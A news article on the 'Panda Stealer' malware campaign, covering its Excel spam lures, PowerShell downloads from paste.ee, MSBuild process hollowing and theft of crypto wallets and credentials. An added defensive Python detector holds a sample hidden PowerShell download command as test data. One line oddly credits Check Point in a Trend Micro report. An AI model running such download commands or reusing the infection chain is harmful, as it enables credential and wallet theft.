'Panda Stealer' Targets Cryptocurrency Wallets
Malware Spread Through Spam Email Campaign
Researchers at Trend Micro have uncovered a new cryptocurrency stealer variant that uses a fileless approach in its global spam email distribution campaign to evade detection.
The gang behind the malware, dubbed "Panda Stealer," starts with emails that appear to be business quote requests to entice recipients to open malicious Excel files, Trend Micro says.
Researchers found that the malware, a modification of Collector Stealer, has targeted victims in the United States, Australia, Japan and Germany.
Trend Micro identified two infection chains. One uses an .XLSM attachment that contains macros that download a loader, which then downloads and executes the main stealer.
The second infection chain method involves an attached .XLS file containing an Excel formula that uses a PowerShell command to access paste.ee, a Pastebin alternative, which accesses a second encrypted PowerShell command.
"Decoding these PowerShell scripts revealed that they are used to access paste.ee URLs for easy implementation of fileless payloads. The CallByName export function in Visual Basic is used to call the loading of a .NET assembly within memory from a paste.ee URL. The loaded assembly, obfuscated with an Agile.NET obfuscator, hollows a legitimate MSBuild.exe process and replaces it with its payload: the hex-encoded Panda Stealer binary from another paste.ee URL," according to the Trend Micro researchers.
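The chain described above leaves two process-creation patterns a defender can look for: an Office process launching PowerShell that reaches out to paste.ee, and MSBuild.exe being started by something other than a build tool (the hollowing step). The following checker is an added example, not code from Trend Micro or the report; the event field names (image, parent_image, command_line) and the sample events are assumptions constructed for this illustration.

```python
# Added example: flag process-creation events matching the Panda Stealer
# infection chain. Field names and sample events are constructed, not real
# telemetry or any vendor's log schema.
from pathlib import PureWindowsPath

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Parents from which MSBuild.exe is normally launched on a developer box.
BUILD_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe", "vbcscompiler.exe"}


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return PureWindowsPath(path).name.lower()


def classify(event: dict) -> list:
    """Return the alert tags raised by one process-creation event."""
    image = _basename(event.get("image", ""))
    parent = _basename(event.get("parent_image", ""))
    cmd = event.get("command_line", "").lower()
    alerts = []
    if parent in OFFICE and image in SHELLS:
        alerts.append("office_spawns_powershell")
        if "paste.ee" in cmd:
            alerts.append("powershell_pasteee_download")
    # MSBuild.exe spawned by a shell is the process-hollowing candidate.
    if image == "msbuild.exe" and parent not in BUILD_PARENTS:
        alerts.append("msbuild_unexpected_parent")
    return alerts


def scan(events: list) -> dict:
    """Map event id -> alert tags for every event that trips a rule."""
    return {ev["id"]: tags for ev in events if (tags := classify(ev))}


SAMPLE_EVENTS = [  # constructed sample events
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "command_line": "powershell -w hidden -c iwr https://paste.ee/r/EXAMPLE"},
    {"id": 2, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "MSBuild.exe"},
    {"id": 3, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "parent_image": r"C:\Program Files\Microsoft Visual Studio\devenv.exe",
     "command_line": "MSBuild.exe app.csproj"},
    {"id": 4, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "cmd.exe"},
]

if __name__ == "__main__":
    for event_id, tags in scan(SAMPLE_EVENTS).items():
        print(event_id, tags)
```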
Once it's installed on a device, Panda Stealer can collect private keys and records of past transactions from victims' digital currency wallets, including Dash, Bytecoin, Litecoin and Ethereum.
"Not only does it target cryptocurrency wallets, it can steal credentials from other applications, such as NordVPN, Telegram, Discord chat app and Steam," the researchers note. "It’s also capable of taking screenshots of the infected computer and exfiltrating data from browsers, like cookies, passwords and cards."
After stealing information, the malware stores stolen files in a %TEMP% folder under random file names. The files are then sent to a command-and-control server. Further analysis of the C2 revealed a login page for "Panda Stealer," Check Point reports.
"But more domains have been identified with the same login page," the researchers say. "Another 14 victims were discovered from the logs of one of these servers. Another 264 files similar to Panda Stealer were found on VirusTotal. More than 140 C2 servers and over 10 download sites were used by these samples."
Some of the download sites were from Discord, researchers say. They report that these contain files with names such as "build.exe," indicating that threat actors may be using Discord to share the Panda Stealer build.
Trend Micro researchers identified an IP address that the attackers apparently used.
"We believe that this address is assigned to a virtual private server rented from Shock Hosting, which the actor infected for testing purposes," the researchers note. "The VPS may be paid for using cryptocurrency to avoid being traced and uses the online service Cassandra Crypter. We have reported this to Shock Hosting, and they confirmed that the server assigned to this IP address has been suspended."
Researchers also discovered an infected device with a history of visiting a Google Drive link, which is also mentioned in a discussion about AZORult log extractor on an underground forum.
"The same link and unique cookie were observed on both the log dumps and the forum, therefore the user who posted on the forum must also have access to that log file," the researchers note.
A Variant of Collector Stealer
Trend Micro says that Panda Stealer is a variant of Collector Stealer, which is sold on some underground forums and a Telegram channel. Collector Stealer has been cracked by a Russian threat actor called NCP, also known as su1c1de, the researchers say.
"Comparing the compiled executables of the cracked Collector Stealer and Panda Stealer shows that the two behave similarly, but have different C2 URLs, build tags, and execution folders," Trend Micro reports. "Like Panda Stealer, Collector Stealer exfiltrates information such as cookies, login data, and web data from a compromised computer, storing them in an SQLite3 database. It also covers its tracks by deleting its stolen files and activity logs after its execution."
A Collector Stealer builder is openly accessible online, and it can be used to create a customized version, the researchers say.
"Threat actors may also augment their malware campaigns with specific features from Collector Stealer. We have also discovered that Panda Stealer has an infection chain that uses the same fileless distribution method as the 'Fair' variant of Phobos ransomware to carry out memory-based attacks, making it more difficult for security tools to spot," the researchers note.